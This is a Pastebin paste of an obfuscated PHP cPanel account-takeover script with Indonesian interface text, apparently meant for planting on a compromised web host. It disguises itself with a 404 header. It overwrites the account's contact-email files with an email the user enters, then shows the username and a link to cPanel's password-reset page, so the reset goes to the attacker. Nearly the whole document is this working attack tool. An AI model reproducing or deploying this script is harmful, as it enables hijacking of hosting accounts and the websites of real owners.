VanGans

Cpanel Reset Password

Sep 8th, 2019
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.76 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. header("HTTP/1.0 404 Not Found");
  4. echo '<!DOCTYPE HTML>
  5. <html>
  6. <head>
  7. <title>Cpanel Reset Password</title>
  8. <style type="text/css">
  9. html {
  10.    margin: 20px auto;
  11.    background: #000000;
  12.    color: green;
  13.    text-align: center;
  14. }
  15. header {
  16.    color: green;
  17.    margin: 10px auto;
  18. }
  19. input[type=password] {
  20.    width: 250px;
  21.    height: 25px;
  22.    color: red;
  23.    background: transparent;
  24.    border: 1px dotted green;
  25.    margin-left: 20px;
  26.    text-align: center;
  27. }
  28. a {
  29.    text-decoration: none;
  30.    color: green;
  31. }
  32. </style>    
  33. </head>
  34. <center>
  35. <header>
  36.    <pre>
  37.  
  38. $$$$$$\                  $$\  $$$$$$\                  $$\          
  39. $$  __$$\                 $$ |$$  __$$\                 $$ |          
  40. $$ /  \__| $$$$$$\   $$$$$$$ |$$ /  \__| $$$$$$\   $$$$$$$ | $$$$$$\  
  41. \$$$$$$\   \____$$\ $$  __$$ |$$ |      $$  __$$\ $$  __$$ |$$  __$$\
  42. \____$$\  $$$$$$$ |$$ /  $$ |$$ |      $$ /  $$ |$$ /  $$ |$$$$$$$$ |
  43. $$\   $$ |$$  __$$ |$$ |  $$ |$$ |  $$\ $$ |  $$ |$$ |  $$ |$$   ____|
  44. \$$$$$$  |\$$$$$$$ |\$$$$$$$ |\$$$$$$  |\$$$$$$  |\$$$$$$$ |\$$$$$$$\
  45. \______/  \_______| \_______| \______/  \______/  \_______| \_______|
  46.  
  47.    - Cpanel Reset Password - Coded By SadCode.org V.0.1-
  48.  
  49.    </pre>
  50. </header>
  51. </center>
  52. <form action="#" method="post">    
  53. <input type="email" name="email" placeholder="Email kalian" />  
  54. <input type="submit" name="submit" value="Crack"/>  
  55. </form>        
  56. <br/><br/><br/>    
  57. </p>'; ?>
  58. <?php
  59. $IIIIIIIIIIII = get_current_user();
  60. $IIIIIIIIIII1 = $_SERVER['HTTP_HOST'];
  61. $IIIIIIIIIIlI = getenv('REMOTE_ADDR');
  62. if (isset($_POST['submit'])) { $email = $_POST['email'];
  63. $IIIIIIIIIIl1 = 'email:' . $email; $IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo', 'w'); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I);
  64. $IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.contactinfo', 'w'); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIIlIl = "https://";
  65. $IIIIIIIIIlI1 = "2083";
  66. $IIIIIIIIIllI = $IIIIIIIIIII1 . ':2083/resetpass?start=1';
  67. $read_named_conf = @file('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo');
  68. if(!$read_named_conf)
  69. {
  70. echo "<h1>gak bisa di akses goblok</h1><br><br> </pre></center>";
  71. }
  72. else
  73. {
  74. echo "<center>Ini User Namenya Salin Lalu Gass <br><br></center>";
  75. echo '<center><input type="text" value="' . $IIIIIIIIIIII . '" id="user"> <button onclick="username()">Salin User</button></center> <script>function username() { var copyText = document.getElementById("user"); copyText.select(); document.execCommand("copy"); } </script> ';
  76. echo '<br/><center><a  target="_blank" href="' . $IIIIIIIIIlIl . '' . $IIIIIIIIIllI . '">Gass Disini</a><br><br></center>'; ;}} ?>
  77. </div>
  78. </div>
  79. </center>
  80. </body>
  81. </html>
Add Comment
Please, Sign In to add comment